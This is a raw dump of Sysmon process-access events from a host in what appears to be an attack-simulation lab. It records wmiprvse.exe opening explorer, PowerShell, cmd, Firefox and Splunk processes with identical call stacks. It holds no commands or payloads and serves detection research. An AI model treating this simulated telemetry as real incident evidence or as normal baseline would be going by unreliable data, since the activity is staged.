16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 